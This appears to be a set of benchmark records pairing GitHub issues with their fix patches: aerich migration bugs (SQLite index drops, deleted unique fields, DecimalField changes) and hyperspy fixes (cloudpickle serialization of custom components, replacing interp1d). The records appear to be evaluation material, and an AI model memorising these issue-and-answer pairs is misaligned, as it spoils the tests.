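# DROP INDEX IF EXISTS "idx_alert_acknowledged"
```

Keeping `IF EXISTS` on the drop side is what makes the migration tolerant of indexes that SQLite already removed when the column was dropped.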
| aerich init-db with sqlite3 freezes
Hello,
I have been observing the same behavior reported [here](https://github.com/tortoise/aerich/issues/63) while using aerich with SQLite.
I have no problem when using the same models with Postgres.
```
aerich init -s src/ -t tci.sqlite.database.TORTOISE_ORM
Success create migrate location ./migrations
Success write config to pyproject.toml
```
```
aerich init-db
Success create app migrate location migrations/models
Success generate schema for app "models"
^CException ignored in: <module 'threading' from '/usr/lib/python3.10/threading.py'>
Traceback (most recent call last):
File "/usr/lib/python3.10/threading.py", line 1567, in _shutdown
lock.acquire()
KeyboardInterrupt:
```
Test with no changes, working as expected
```
aerich init-db
Success create app migrate location migrations/models
Success generate schema for app "models"
^CException ignored in: <module 'threading' from '/usr/lib/python3.10/threading.py'>
Traceback (most recent call last):
File "/usr/lib/python3.10/threading.py", line 1567, in _shutdown
lock.acquire()
KeyboardInterrupt:
```
Removing the "acknowledged" column from the model
```
aerich migrate --name drop_column
Traceback (most recent call last):
File "my_dir/bin/aerich", line 8, in <module>
sys.exit(main())
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 258, in main
cli()
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1130, in __call__
return self.main(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1055, in main
rv = self.invoke(ctx)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1657, in invoke
return _process_result(sub_ctx.command.invoke(sub_ctx))
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1404, in invoke
return ctx.invoke(self.callback, **ctx.params)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 760, in invoke
return __callback(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/decorators.py", line 26, in new_func
return f(get_current_context(), *args, **kwargs)
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 31, in wrapper
loop.run_until_complete(f(*args, **kwargs))
File "/usr/lib/python3.10/asyncio/base_events.py", line 646, in run_until_complete
return future.result()
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 86, in migrate
ret = await command.migrate(name)
File "my_dir/lib/python3.10/site-packages/aerich/__init__.py", line 121, in migrate
return await Migrate.migrate(name)
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 140, in migrate
cls.diff_models(cls._last_version_content, new_version_content)
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 388, in diff_models
cls._drop_index(
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 527, in _drop_index
fields_name = cls._resolve_fk_fields_name(model, fields_name)
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 512, in _resolve_fk_fields_name
field = model._meta.fields_map[field_name]
KeyError: 'acknowledged'
```
```
pip list |grep aerich
aerich 0.7.1
```
| I have tried the workaround described [here](https://github.com/tortoise/aerich/issues/295), i.e., downgrading to version 0.6.3.
That fixed `init-db`; however, the upgrade still fails.
```
Installing collected packages: aerich
Attempting uninstall: aerich
Found existing installation: aerich 0.7.0
Uninstalling aerich-0.7.0:
Successfully uninstalled aerich-0.7.0
Successfully installed aerich-0.6.3
```
```
aerich init -s src/ -t tci.sqlite.database.TORTOISE_ORM
Success create migrate location ./migrations
Success write config to pyproject.toml
```
```
aerich init-db
Success create app migrate location migrations/models
Success generate schema for app "models"
```
```
aerich migrate --name opsgenie_comment_column_dropped
Success migrate 5_20230518173359_opsgenie_comment_column_dropped.sql
(opsgenie_to_jira) mic@U333633:my_dir$ aerich upgrade
Traceback (most recent call last):
File "my_dir/lib/python3.10/site-packages/tortoise/backends/sqlite/client.py", line 34, in translate_exceptions_
return await func(self, query, *args)
File "my_dir/lib/python3.10/site-packages/tortoise/backends/sqlite/client.py", line 155, in execute_script
await connection.executescript(query)
File "my_dir/lib/python3.10/site-packages/aiosqlite/core.py", line 216, in executescript
cursor = await self._execute(self._conn.executescript, sql_script)
File "my_dir/lib/python3.10/site-packages/aiosqlite/core.py", line 129, in _execute
return await future
File "my_dir/lib/python3.10/site-packages/aiosqlite/core.py", line 102, in run
result = function()
sqlite3.OperationalError: error in index idx_alert_acknowl_8a515a after drop column: no such column: acknowledged
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "my_dir/bin/aerich", line 8, in <module>
sys.exit(main())
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 257, in main
cli()
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1130, in __call__
return self.main(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1055, in main
rv = self.invoke(ctx)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1657, in invoke
return _process_result(sub_ctx.command.invoke(sub_ctx))
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1404, in invoke
return ctx.invoke(self.callback, **ctx.params)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 760, in invoke
return __callback(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/decorators.py", line 26, in new_func
return f(get_current_context(), *args, **kwargs)
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 31, in wrapper
loop.run_until_complete(f(*args, **kwargs))
File "/usr/lib/python3.10/asyncio/base_events.py", line 646, in run_until_complete
return future.result()
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 97, in upgrade
migrated = await command.upgrade()
File "my_dir/lib/python3.10/site-packages/aerich/__init__.py", line 55, in upgrade
await conn.execute_script(upgrade_query)
File "my_dir/lib/python3.10/site-packages/tortoise/backends/sqlite/client.py", line 36, in translate_exceptions_
raise OperationalError(exc)
tortoise.exceptions.OperationalError: error in index idx_alert_acknowl_8a515a after drop column: no such column: acknowledged
```
I have also tried not to have that column as an index, and in spite of the migration throwing an error, the upgrade succeeded
```
aerich migrate --name opsgenie_comment_column_dropped
Traceback (most recent call last):
File "my_dir/bin/aerich", line 8, in <module>
sys.exit(main())
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 257, in main
cli()
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1130, in __call__
return self.main(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1055, in main
rv = self.invoke(ctx)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1657, in invoke
return _process_result(sub_ctx.command.invoke(sub_ctx))
File "my_dir/lib/python3.10/site-packages/click/core.py", line 1404, in invoke
return ctx.invoke(self.callback, **ctx.params)
File "my_dir/lib/python3.10/site-packages/click/core.py", line 760, in invoke
return __callback(*args, **kwargs)
File "my_dir/lib/python3.10/site-packages/click/decorators.py", line 26, in new_func
return f(get_current_context(), *args, **kwargs)
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 31, in wrapper
loop.run_until_complete(f(*args, **kwargs))
File "/usr/lib/python3.10/asyncio/base_events.py", line 646, in run_until_complete
return future.result()
File "my_dir/lib/python3.10/site-packages/aerich/cli.py", line 86, in migrate
ret = await command.migrate(name)
File "my_dir/lib/python3.10/site-packages/aerich/__init__.py", line 126, in migrate
return await Migrate.migrate(name)
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 132, in migrate
cls.diff_models(cls._last_version_content, new_version_content)
File "my_dir/lib/python3.10/site-packages/aerich/migrate.py", line 184, in diff_models
old_models.pop(_aerich, None)
AttributeError: 'NoneType' object has no attribute 'pop'
```
```
aerich upgrade
Success upgrade 5_20230518173819_None.sql
```
Try removing migrations/models and the aerich table, then rerun migrate
I tried that, but to no avail.
Just in case you wish to reproduce the problem, here is a simple model.
```
class Alert(models.Model):
id = fields.IntField(pk=True)
opsgenie_id = fields.CharField(max_length=50, index=True, unique=True, null=False)
priority = fields.SmallIntField(null=False, index=True)
message = fields.TextField(null=False)
team = fields.CharField(max_length=20, null=False)
site = fields.CharField(max_length=10, null=False)
stage = fields.CharField(max_length=3, null=False)
created_at = fields.DatetimeField(null=True)
updated_at = fields.DatetimeField(null=True)
jira_id = fields.CharField(max_length=30)
acknowledged = fields.BooleanField(default=False, index=True, null=False) # try to remove this field
```
```
orm_config = {
"connections": {
"default": {
"engine": "tortoise.backends.sqlite",
"credentials": {"file_path": "db.sqlite3"},
}
},
"apps": {
"models": {
"models": ["tci.sqlite.models", "aerich.models"],
"default_connection": "default",
}
},
}
```
Same happened to me.
It'd be great if someone could provide any sort of workaround. | 2024-12-10T04:10:58 | 0.0 | [] | [] |
||
tortoise/aerich | tortoise__aerich-365 | 103470f4c1ca6bd20146368d3990a587afe75d09 | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 415b727..3cb2f49 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,7 +7,7 @@
- Correct the click import. (#360)
- Improve CLI help text and output. (#355)
- Fix mysql drop unique index raises OperationalError. (#346)
-
+- Fix KeyError when deleting a field with unique=True. (#364)
**Upgrade note:**
1. Use column name as unique key name for mysql
2. Drop support for Python3.7
diff --git a/aerich/migrate.py b/aerich/migrate.py
index 60132a3..20bd161 100644
--- a/aerich/migrate.py
+++ b/aerich/migrate.py
@@ -425,8 +425,9 @@ def diff_models(
upgrade,
)
if old_data_field["indexed"]:
+ is_unique_field = old_data_field.get("unique")
cls._add_operator(
- cls._drop_index(model, {db_column}),
+ cls._drop_index(model, {db_column}, is_unique_field),
upgrade,
True,
)
@@ -548,13 +549,17 @@ def drop_m2m(cls, table_name: str) -> str:
def _resolve_fk_fields_name(cls, model: Type[Model], fields_name: Iterable[str]) -> List[str]:
ret = []
for field_name in fields_name:
- field = model._meta.fields_map[field_name]
- if field.source_field:
- ret.append(field.source_field)
- elif field_name in model._meta.fk_fields:
- ret.append(field_name + "_id")
+ try:
+ field = model._meta.fields_map[field_name]
+ except KeyError:
+                # field dropped or to be added
+ pass
else:
- ret.append(field_name)
+ if field.source_field:
+ field_name = field.source_field
+ elif field_name in model._meta.fk_fields:
+ field_name += "_id"
+ ret.append(field_name)
return ret
@classmethod
| When deleting a field with unique=True it will raise KeyError
**Describe the bug**
When deleting a field with unique=True, it will raise a KeyError.
**To Reproduce**
version:
MySQL 8.0; tortoise-orm branch is develop (version 905daaa53928622b53454f65fd629690a7e5491f); aerich branch is dev (version 15d56121ef9d918f5dc826898c38c6b0513ec898)
Steps to reproduce:
1. This is my model:
```
class Tasks(Model):
"""任务表"""
id = fields.IntField(pk=True)
name = fields.CharField(max_length=100, unique=True, description="任务名称")
status = fields.IntEnumField(enum_type=TaskStatus, description="任务状态")
class Meta:
table = "tb_tasks"
```
2. Init the db:
```
aerich init -t utils.config.TORTOISE_CONFIG
aerich init-db
```
3. Delete the `name` field from the model in step 1:
```
class Tasks(Model):
"""任务表"""
id = fields.IntField(pk=True)
status = fields.IntEnumField(enum_type=TaskStatus, description="任务状态")
class Meta:
table = "tb_tasks"
```
4. Migrate and upgrade:
```
aerich migrate
aerich upgrade
```
5. It will raise an exception:
`KeyError: 'name'`
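The `KeyError` comes from `_resolve_fk_fields_name` (patched above), which indexed `fields_map` for a field that no longer exists on the model. A simplified, hypothetical sketch of the tolerant lookup the fix introduces (plain dicts stand in for tortoise field objects):

```python
def resolve_fk_fields_name(fields_map, fk_fields, field_names):
    """Map logical field names to column names, skipping dropped fields."""
    resolved = []
    for name in field_names:
        try:
            field = fields_map[name]
        except KeyError:
            # field was just dropped (or is about to be added) -- skip it
            continue
        if field.get("source_field"):
            name = field["source_field"]
        elif name in fk_fields:
            name += "_id"
        resolved.append(name)
    return resolved

fields = {"id": {}, "status": {}}
print(resolve_fk_fields_name(fields, set(), ["name"]))         # [] -- no KeyError
print(resolve_fk_fields_name(fields, {"status"}, ["status"]))  # ['status_id']
```

The dropped `name` field is silently skipped, so the unique-index drop can still be generated for the remaining columns.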
Can't get "TORTOISE_ORM" from module
My workdir list:
```
.
├── Dockerfile
├── __init__.py
├── aerich.ini
├── docker-compose.yml
├── main.py
├── migrations
├── models.py
├── requirements.txt
└── settings.py
```
aerich.ini
```
[aerich]
tortoise_orm = settings.TORTOISE_ORM
location = ./migrations
```
settings.py
```
TORTOISE_ORM = dict()
```
I got an error when executing `aerich init-db` in the work folder root.
```
Error: Can't get "TORTOISE_ORM" from module "<module 'settings' from './settings.py'>"
```
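For reference, aerich resolves the dotted path by importing the module and reading the attribute. A hypothetical stdlib sketch of that lookup (the function name and fake module are illustrative), which also shows why an empty `TORTOISE_ORM = dict()` is rejected:

```python
import importlib
import sys
import types

def load_config(dotted_path):
    """Load e.g. 'settings.TORTOISE_ORM'; empty or missing configs raise."""
    module_path, _, attr = dotted_path.rpartition(".")
    module = importlib.import_module(module_path)
    config = getattr(module, attr, None)
    if not config:
        raise ValueError(f"Can't get {attr!r} from module {module_path!r}")
    return config

# Fake settings module so the sketch is runnable stand-alone
settings = types.ModuleType("fake_settings")
settings.TORTOISE_ORM = {"connections": {"default": "sqlite://db.sqlite3"}}
sys.modules["fake_settings"] = settings

print(load_config("fake_settings.TORTOISE_ORM")["connections"]["default"])
# sqlite://db.sqlite3
```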
|
TORTOISE_ORM can't be empty
Hi, nice to see you resolved it. | 2024-11-14T10:39:05 | 0.0 | [] | [] |
||
tortoise/aerich | tortoise__aerich-249 | 8f68f08eba7fbb218e2f1af51c5ecd9aed3b90ee | diff --git a/aerich/__init__.py b/aerich/__init__.py
index 7303e58..2eec79c 100644
--- a/aerich/__init__.py
+++ b/aerich/__init__.py
@@ -8,9 +8,9 @@
from tortoise.utils import get_schema_sql
from aerich.exceptions import DowngradeError
-from aerich.inspect.mysql import InspectMySQL
-from aerich.inspect.postgres import InspectPostgres
-from aerich.inspect.sqlite import InspectSQLite
+from aerich.inspectdb.mysql import InspectMySQL
+from aerich.inspectdb.postgres import InspectPostgres
+from aerich.inspectdb.sqlite import InspectSQLite
from aerich.migrate import Migrate
from aerich.models import Aerich
from aerich.utils import (
diff --git a/aerich/inspect/__init__.py b/aerich/inspectdb/__init__.py
similarity index 100%
rename from aerich/inspect/__init__.py
rename to aerich/inspectdb/__init__.py
diff --git a/aerich/inspect/mysql.py b/aerich/inspectdb/mysql.py
similarity index 98%
rename from aerich/inspect/mysql.py
rename to aerich/inspectdb/mysql.py
index 7d62bff..64dc2ba 100644
--- a/aerich/inspect/mysql.py
+++ b/aerich/inspectdb/mysql.py
@@ -1,6 +1,6 @@
from typing import List
-from aerich.inspect import Column, Inspect
+from aerich.inspectdb import Column, Inspect
class InspectMySQL(Inspect):
diff --git a/aerich/inspect/postgres.py b/aerich/inspectdb/postgres.py
similarity index 98%
rename from aerich/inspect/postgres.py
rename to aerich/inspectdb/postgres.py
index 8327618..0f22bb1 100644
--- a/aerich/inspect/postgres.py
+++ b/aerich/inspectdb/postgres.py
@@ -2,7 +2,7 @@
from tortoise import BaseDBAsyncClient
-from aerich.inspect import Column, Inspect
+from aerich.inspectdb import Column, Inspect
class InspectPostgres(Inspect):
diff --git a/aerich/inspect/sqlite.py b/aerich/inspectdb/sqlite.py
similarity index 98%
rename from aerich/inspect/sqlite.py
rename to aerich/inspectdb/sqlite.py
index 885b9c0..7f35e1f 100644
--- a/aerich/inspect/sqlite.py
+++ b/aerich/inspectdb/sqlite.py
@@ -1,6 +1,6 @@
from typing import List
-from aerich.inspect import Column, Inspect
+from aerich.inspectdb import Column, Inspect
class InspectSQLite(Inspect):
diff --git a/aerich/migrate.py b/aerich/migrate.py
index e114858..82d30ee 100644
--- a/aerich/migrate.py
+++ b/aerich/migrate.py
@@ -422,8 +422,14 @@ def diff_models(cls, old_models: Dict[str, dict], new_models: Dict[str, dict], u
cls._drop_index(model, (field_name,), unique), upgrade, True
)
elif option == "db_field_types.":
- # continue since repeated with others
- continue
+ if new_data_field.get("field_type") == "DecimalField":
+ # modify column
+ cls._add_operator(
+ cls._modify_field(model, new_data_field),
+ upgrade,
+ )
+ else:
+ continue
elif option == "default":
if not (
is_default_function(old_new[0]) or is_default_function(old_new[1])
| fields.DecimalField can't change max_digits, decimal_places by migrate
### env
- tortoise-orm==0.19.1
- asyncmy==0.2.5
- aerich==0.6.3
### desc
If you change
`longitude = fields.DecimalField(max_digits=12, decimal_places=9)`
to
`longitude = fields.DecimalField(max_digits=16, decimal_places=14)`,
aerich can't generate a migration file.
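The root cause is that aerich collapsed every `db_field_types.` diff entry with a blanket `continue`; the patch above special-cases `DecimalField`, whose precision lives only in the db type string. A stdlib sketch of that decision:

```python
def should_modify_column(option, new_data_field):
    """Decide whether a diff entry must emit a MODIFY COLUMN (sketch)."""
    if option == "db_field_types.":
        # Only DecimalField encodes max_digits/decimal_places in its db type,
        # so only it needs an ALTER when that string changes.
        return new_data_field.get("field_type") == "DecimalField"
    return True

new = {"field_type": "DecimalField", "db_field_types": {"": "DECIMAL(16,14)"}}
print(should_modify_column("db_field_types.", new))                        # True
print(should_modify_column("db_field_types.", {"field_type": "CharField"}))  # False
```

With the old blanket `continue`, the DECIMAL(12,9) → DECIMAL(16,14) change fell into the skipped branch, hence "No changes detected".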
| I have the same issue too :( Aerich shows "No changes detected"
> I have the same issue too :( Aerich shows "No changes detected"
In the end, I wrote a migration SQL file to change it manually. | 2022-06-27T03:36:42 | 0.0 | [] | [] |
||
hyperspy/hyperspy | hyperspy__hyperspy-3262 | 4cafc47daf68f0e01b9d64822736fe875c63f690 | diff --git a/hyperspy/component.py b/hyperspy/component.py
index d00d16ff24..676f24c079 100644
--- a/hyperspy/component.py
+++ b/hyperspy/component.py
@@ -721,11 +721,12 @@ def default_traits_view(self):
@add_gui_method(toolkey="hyperspy.Component")
class Component(t.HasTraits):
__axes_manager = None
+ # setting dtype for t.Property(t.Bool) causes serialization error with cloudpickle
+ active = t.Property()
+ name = t.Property()
- active = t.Property(t.CBool(True))
- name = t.Property(t.Str(''))
-
- def __init__(self, parameter_name_list, linear_parameter_list=None):
+ def __init__(self, parameter_name_list, linear_parameter_list=None, *args, **kwargs):
+ super().__init__(*args, **kwargs)
self.events = Events()
self.events.active_changed = Event("""
Event that triggers when the `Component.active` changes.
@@ -806,6 +807,8 @@ def _get_name(self):
return self._name
def _set_name(self, value):
+ if not isinstance(value, str):
+ raise ValueError('Only string values are permitted')
old_value = self._name
if old_value == value:
return
diff --git a/hyperspy/model.py b/hyperspy/model.py
index fc6da82b19..1015dc4ae4 100644
--- a/hyperspy/model.py
+++ b/hyperspy/model.py
@@ -125,7 +125,14 @@ def reconstruct_component(comp_dictionary, **init_args):
elif "_class_dump" in comp_dictionary:
# When a component is not registered using the extension mechanism,
# it is serialized using cloudpickle.
- _class = cloudpickle.loads(comp_dictionary['_class_dump'])
+ try:
+ _class = cloudpickle.loads(comp_dictionary['_class_dump'])
+ except TypeError: # pragma: no cover
+ # https://github.com/cloudpipe/cloudpickle/blob/master/README.md
+ raise TypeError("Pickling is not (always) supported between python "
+ "versions. As a result the custom class cannot be "
+ "loaded. Consider adding a custom Component using the "
+ "extension mechanism.")
else:
# For component saved with hyperspy <2.0 and moved to exspy
if comp_dictionary["_id_name"] in EXSPY_HSPY_COMPONENTS:
diff --git a/upcoming_changes/3262.bugfix.rst b/upcoming_changes/3262.bugfix.rst
new file mode 100644
index 0000000000..448b0c14ad
--- /dev/null
+++ b/upcoming_changes/3262.bugfix.rst
@@ -0,0 +1,2 @@
+Fix serialization error due to :py:class:`traits.api.Property` not being serializable if a dtype is specified.
+See #3261 for more details.
\ No newline at end of file
| Serialisation of custom component fails
I have tried to use the following code to generate a file with a saved custom component (which dumps the class), and I can't even save the file:
```python
import hyperspy.api as hs
from hyperspy.component import Component
class CustomComponent(Component):
def __init__(self, p1=1, p2=2):
Component.__init__(self, ('p1', 'p2'))
self.p1.value = p1
self.p2.value = p2
self.p1.grad = self.grad_p1
self.p2.grad = self.grad_p2
def function(self, x):
p1 = self.p1.value
p2 = self.p2.value
return p1 + x * p2
def grad_p1(self, x):
return 0
def grad_p2(self, x):
return x
s = hs.signals.Signal1D(range(10))
m = s.create_model()
c = CustomComponent()
m.append(c)
m.store('a')
import hyperspy
version = hyperspy.__version__
s.save(f"hs{version}_custom_component.hspy")
```
It seems that saving a custom component is broken, but surprisingly, the code is covered [according to codecov](https://app.codecov.io/gh/hyperspy/hyperspy/blob/RELEASE_next_major/hyperspy%2Fcomponent.py#L1215)...
_Originally posted by @ericpre in https://github.com/hyperspy/hyperspy/issues/3255#issuecomment-1800106824_
| @ericpre are you getting an error read out? It just keeps on crashing the kernel that I am using when I test this in Jupyter.
There is no error message, as it kills the Python process... Running from a script is the same...
Just adding some more information here... The problem is related to cloudpickle not serializing the `__class__` for a custom component.
https://github.com/hyperspy/hyperspy/blob/4cafc47daf68f0e01b9d64822736fe875c63f690/hyperspy/component.py#L1214-L1217
```python
import cloudpickle
cloudpickle.dumps(CustomComponent)
```
has the same result
Edit:
And interestingly:
```python
class ComponentSub(Component):
pass
cloudpickle.dumps(ComponentSub)
```
Fails as well even though
```python
cloudpickle.dumps(Component)
```
works
As @francisco-dlp suggested, it seems to be a traits error, specifically something to do with `t.Property` attributes.
Just playing around with some stuff to see what does and doesn't work...
```python
import traits.api as t
import cloudpickle
class TraitsObj(t.HasTraits):
name = t.Property(t.Str(''))
def __init__(self, name=""):
self._name = name
def _get_name(self):
return self._name
def _set_name(self, value):
self._name = value
cloudpickle.dumps(TraitsObj)
```
Appears to fail but this is a little weird because the `Component` class doesn't fail...
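The eventual fix dropped the typed `t.Property(...)` declarations and moved validation into the setter instead. A plain-Python stand-in of the same shape (using the built-in `property`, since the typed traits machinery is what trips cloudpickle; this is a sketch, not hyperspy's actual class):

```python
class Component:
    """Stand-in for hyperspy's Component: untyped property + setter validation."""

    def __init__(self, name=""):
        self._name = name

    @property
    def name(self):
        return self._name

    @name.setter
    def name(self, value):
        # Validation that t.Property(t.Str('')) used to provide via its dtype
        if not isinstance(value, str):
            raise ValueError("Only string values are permitted")
        self._name = value

c = Component("Gaussian")
c.name = "Lorentzian"
print(c.name)  # Lorentzian
```

The type check still rejects non-string names, but nothing type-specific is baked into the class attribute that cloudpickle has to serialize.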
| 2023-11-08T19:18:42 | 0.0 | [] | [] |
||
hyperspy/hyperspy | hyperspy__hyperspy-3233 | b1d4de908770713da75fbfa39e4dbb66acff8d7e | diff --git a/hyperspy/_components/scalable_fixed_pattern.py b/hyperspy/_components/scalable_fixed_pattern.py
index 9ba4b169c5..7b0b3f9c84 100644
--- a/hyperspy/_components/scalable_fixed_pattern.py
+++ b/hyperspy/_components/scalable_fixed_pattern.py
@@ -17,7 +17,7 @@
# along with HyperSpy. If not, see <https://www.gnu.org/licenses/#GPL>.
import numpy as np
-from scipy.interpolate import interp1d
+from scipy.interpolate import make_interp_spline
from hyperspy.component import Component
from hyperspy.ui_registry import add_gui_method
@@ -97,37 +97,23 @@ def interpolate(self, value):
self.xscale.free = value
self.shift.free = value
- def prepare_interpolator(self, kind='linear', fill_value=0, **kwargs):
+ def prepare_interpolator(self, **kwargs):
"""Prepare interpolation.
Parameters
----------
x : array
The spectral axis of the fixed pattern
- kind : str or int, optional
- Specifies the kind of interpolation as a string
- ('linear', 'nearest', 'zero', 'slinear', 'quadratic, 'cubic')
- or as an integer specifying the order of the spline interpolator
- to use. Default is 'linear'.
-
- fill_value : float, optional
- If provided, then this value will be used to fill in for requested
- points outside of the data range. If not provided, then the default
- is NaN.
-
- Notes
- -----
- Any extra keyword argument is passed to `scipy.interpolate.interp1d`
-
+ **kwargs : dict
+ Keywords argument are passed to
+ :py:func:`scipy.interpolate.make_interp_spline`
"""
- self.f = interp1d(
+ self.f = make_interp_spline(
self.signal.axes_manager.signal_axes[0].axis,
self.signal.data.squeeze(),
- kind=kind,
- bounds_error=False,
- fill_value=fill_value,
- **kwargs)
+ **kwargs
+ )
def _function(self, x, xscale, yscale, shift):
if self.interpolate is True:
diff --git a/hyperspy/_signals/signal1d.py b/hyperspy/_signals/signal1d.py
index 367c8ee1f7..401034a0ae 100644
--- a/hyperspy/_signals/signal1d.py
+++ b/hyperspy/_signals/signal1d.py
@@ -22,6 +22,7 @@
import warnings
import numpy as np
+import numpy.ma as ma
import dask.array as da
from scipy import interpolate
from scipy.signal import savgol_filter, medfilt
@@ -226,7 +227,11 @@ def interpolate1D(number_of_interpolation_points, data):
ch = len(data)
old_ax = np.linspace(0, 100, ch)
new_ax = np.linspace(0, 100, ch * ip - (ip - 1))
- interpolator = interpolate.interp1d(old_ax, data)
+
+ data = ma.masked_invalid(data)
+ interpolator = interpolate.make_interp_spline(
+ old_ax, data, k=1, check_finite=False,
+ )
return interpolator(new_ax)
@@ -256,9 +261,11 @@ def _shift1D(data, **kwargs):
if np.isnan(shift) or shift == 0:
return data
- #This is the interpolant function
- si = interpolate.interp1d(original_axis, data, bounds_error=False,
- fill_value=fill_value, kind=kind)
+ data = ma.masked_invalid(data)
+ # #This is the interpolant function
+ si = interpolate.make_interp_spline(
+ original_axis, data, k=1, check_finite=False
+ )
#Evaluate interpolated data at shifted positions
return si(original_axis-shift)
diff --git a/hyperspy/misc/eels/base_gos.py b/hyperspy/misc/eels/base_gos.py
index 24316a94ea..10ce56a8d9 100644
--- a/hyperspy/misc/eels/base_gos.py
+++ b/hyperspy/misc/eels/base_gos.py
@@ -153,4 +153,4 @@ def integrateq(self, onset_energy, angle, E0):
qint *= (4.0 * np.pi * a0 ** 2.0 * R ** 2 / E / T *
self.subshell_factor) * 1e28
self.qint = qint
- return interpolate.interp1d(E, qint, kind=3)
+ return interpolate.make_interp_spline(E, qint, k=3)
diff --git a/hyperspy/misc/eels/hydrogenic_gos.py b/hyperspy/misc/eels/hydrogenic_gos.py
index c960e76767..3286636d82 100644
--- a/hyperspy/misc/eels/hydrogenic_gos.py
+++ b/hyperspy/misc/eels/hydrogenic_gos.py
@@ -144,7 +144,9 @@ def integrateq(self, onset_energy, angle, E0):
lambda x: self.gosfunc(E, np.exp(x)),
math.log(qa0sqmin), math.log(qa0sqmax))[0])
self.qint = qint
- return interpolate.interp1d(self.energy_axis + energy_shift, qint)
+ return interpolate.make_interp_spline(
+ self.energy_axis + energy_shift, qint, k=1,
+ )
def gosfuncK(self, E, qa02):
# gosfunc calculates (=DF/DE) which IS PER EV AND PER ATOM
diff --git a/hyperspy/signal.py b/hyperspy/signal.py
index 2078c7c49a..a41ac02e1b 100644
--- a/hyperspy/signal.py
+++ b/hyperspy/signal.py
@@ -3112,32 +3112,30 @@ def interpolate_on_axis(self,
axis=0,
inplace=False,
degree=1):
- """Replaces the given `axis` with the provided `new_axis`
- and interpolates data accordingly using :py:func:`scipy.interpolate.make_interp_spline`.
+ """Replaces the given ``axis`` with the provided ``new_axis``
+ and interpolates data accordingly using
+ :py:func:`scipy.interpolate.make_interp_spline`.
Parameters
----------
new_axis : UniformDataAxis, DataAxis or FunctionalDataAxis
- Axis which replaces the one specified by the `axis` argument.
+ Axis which replaces the one specified by the ``axis`` argument.
If this new axis exceeds the range of the old axis,
a warning is raised that the data will be extrapolated.
-
axis : int or str, default=0
Specifies the axis which will be replaced using the index of the
axis in the `axes_manager`. The axis can be specified using the index of the
axis in `axes_manager` or the axis name.
-
inplace : bool, default=False
If ``True`` the data of `self` is replaced by the result and
the axis is changed inplace. Otherwise `self` is not changed
and a new signal with the changes incorporated is returned.
-
degree: int, default=1
Specifies the B-Spline degree of the used interpolator.
Returns
-------
- s : :py:class:`~hyperspy.signal.BaseSignal` (or subclass)
+ s : :py:class:`~.api.signals.BaseSignal` (or subclass)
A copy of the object with the axis exchanged and the data interpolated.
This only occurs when inplace is set to ``False``, otherwise nothing is returned.
"""
diff --git a/hyperspy/signal_tools.py b/hyperspy/signal_tools.py
index 26165e7ecf..bb86f688ae 100644
--- a/hyperspy/signal_tools.py
+++ b/hyperspy/signal_tools.py
@@ -1747,7 +1747,7 @@ def __init__(self, signal, navigation_mask=None, signal_mask=None,
_logger.info(f'Threshold value: {threshold}')
self.argmax = None
self.derivmax = None
- self.kind = "linear"
+ self.spline_order = 1
self._temp_mask = np.zeros(self.signal().shape, dtype='bool')
self.index = 0
self.threshold = threshold
@@ -1826,10 +1826,7 @@ def get_interpolated_spectrum(self, axes_manager=None):
data = self.signal().copy()
axis = self.signal.axes_manager.signal_axes[0]
left, right = self.get_interpolation_range()
- if self.kind == 'linear':
- pad = 1
- else:
- pad = self.spline_order
+ pad = self.spline_order
ileft = left - pad
iright = right + pad
ileft = np.clip(ileft, 0, len(data))
@@ -1852,7 +1849,7 @@ def get_interpolated_spectrum(self, axes_manager=None):
# Interpolate
x = np.hstack((axis.axis[ileft:left], axis.axis[right:iright]))
y = np.hstack((data[ileft:left], data[right:iright]))
- intp = interpolate.interp1d(x, y, kind=self.kind)
+ intp = interpolate.make_interp_spline(x, y, k=self.spline_order)
data[left:right] = intp(axis.axis[left:right])
# Add noise
@@ -1882,17 +1879,11 @@ def remove_all_spikes(self):
@add_gui_method(toolkey="hyperspy.Signal1D.spikes_removal_tool")
class SpikesRemovalInteractive(SpikesRemoval, SpanSelectorInSignal1D):
- interpolator_kind = t.Enum(
- 'Linear',
- 'Spline',
- default='Linear',
- desc="the type of interpolation to use when\n"
- "replacing the signal where a spike has been replaced")
threshold = t.Float(400, desc="the derivative magnitude threshold above\n"
"which to find spikes")
click_to_show_instructions = t.Button()
show_derivative_histogram = t.Button()
- spline_order = t.Range(1, 10, 3,
+ spline_order = t.Range(1, 10, 1,
desc="the order of the spline used to\n"
"connect the reconstructed data")
interpolator = None
@@ -2013,19 +2004,13 @@ def on_disabling_span_selector(self):
self.interpolated_line = None
def _spline_order_changed(self, old, new):
- self.kind = self.spline_order
- self.span_selector_changed()
+ if new != old:
+ self.spline_order = new
+ self.span_selector_changed()
def _add_noise_changed(self, old, new):
self.span_selector_changed()
- def _interpolator_kind_changed(self, old, new):
- if new == 'linear':
- self.kind = new
- else:
- self.kind = self.spline_order
- self.span_selector_changed()
